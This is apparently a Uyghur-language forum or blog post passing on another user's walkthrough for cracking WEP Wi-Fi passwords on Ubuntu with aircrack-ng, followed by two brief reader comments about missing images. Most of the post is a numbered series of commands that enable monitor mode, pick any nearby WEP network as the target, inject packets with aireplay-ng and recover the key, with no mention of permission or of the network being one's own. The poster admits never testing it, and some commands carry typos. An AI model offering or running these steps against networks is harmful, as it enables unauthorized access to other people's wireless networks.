تۆۋەندىكىسى مەلۈم تورداشنىڭ ئۇبۇنتۇدا سىمسىز تورنى يېشىش جەريانىدىكى تەجىرىبىسى ئىكەن، قېنى بىزمۇ كۆرۈپ باقايلى: ( ئەپسۈس، مەندە سىمسىز تور كارتىسى يوق بولغانلىقى ئۈچۈن، سىناق قىلىشقا ئامالسىز قالدىم )
1) قەدەم:
ئالدى بىلەن aircrack-ng نى قاچىلايمىز.
sudo apt-get install aircrack-ng
2) قەدەم:
سىمسىز تورنى قوزغىتىمىز. ئەگەر windows مۈھىتىدا سىمسىىز تورنى تاقىۋەتكەن بولساق ئالدى بىلەن ئۇنى ئېچىشىمىز كېرەك، بولمىسا ئۇبۇنتۇدا سىمسىز قوزغالمايدۇ. سىمسىز تور نورمال قوزغالغاندىن كېيىن تېرمىنالغا ifconfig -a بۇيرۇقىنى بېرىش ئارقىلىق wlan نىڭ ئېچىلغان ئېچىلمىغانلىقىنى تەكشۈرىمىز.
3) قەدەم:
يۇقارقى تەييارلىق خىزمەتلەر ئاخىرلاشقاندىن كېيىن، ئەمدى يېشىشنى باشلايمىز.
sudo airmon-ng start wlan0
sudo airodump -ng mon0
بۇ ۋاقىتتا ئېكراندا سىمسىز تورنىڭ mac ئادىرىسى ۋە چاستوتىسى ( قانال ) پەيدا بولىدۇ. ئوبيېكىتنى تاللىغاندا تۈرى wep بولغانلىرىنى تاللايمىز.
4) قەدەم:
sudo airodump-ng -c XXXX –bssid YYYY -w wep mon0
XXXX گە ئوبيېكىتنىڭ چاستوتىنى، YYYY گە ئوبيېكىتنىڭ mac ئادىرسىنى كىرگۈزىمىز
5) قەدەم:
sudo aireplay-ng -1 0 -a YYYY -h ZZZZ mon0
YYYY گە ئوبيېكىتنىڭ mac ئادىرسىنى، ZZZZ گە ئۆزىمىزنىڭ mac ئادىرسىنى كىرگۈزىمىز
( ئۆزىمىزنىڭ mac ئادىرسىنى ifconfig -a ئارقىلىق تەكشۈرۈپ تاپساق بولىدۇ )
ھەممە ئىش نورمال بولسا، مۇۋەپپەقىيەت قازانغانلىق ئەسكەرتىش ئۈچۈرى كۆرۇنىدۇ. ئەگەر ئەسكەرتىش ئۈچۈرى كۆرۈنمىسە ئوبيېكىت ئامىلى ياكى سېستىمىنىڭ مۇقىمسىزلىق ئامىلى سەۋەب بولغان بولىدۇ.
6) قەدەم:
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b YYYY -h ZZZZ mon0
7) قەدەم:
sudo aircrack-ng wep*.cap
بۇ ۋاقىتتا پاروللنى يېشىشقا باشلايدۇ.
8) قەدەم:
sudo airmon-ng stop mon0
يۇقارقى بۇيرۇق ئارقىلىق نازارەتنى ئاياقلاشتۇرۇشقا بولىدۇ. ( sudo airomon-ng check دىن پايدىلىنىپ نازارەت قىلىشقا مۇناسىۋەتلىك ئۈچۈرلارغا ئېرىشەلەيمىز )
ئەسسالامۇ – ئەلەيكۇم ، دوستۇم بۇ تىمىدىكى رەسىملەر چىقمىدىمۇ قانداق ؟ مۇمكىن بولسا ئوڭشاپ قويسىڭىز .
بۇ تېما رەسىملىك تېما ئەمەس … سىز بېرىلگەن بۇيرۇقلاردىن پايدىلىنىپ يىشىپ كۆرسىڭىز بولىدۇ .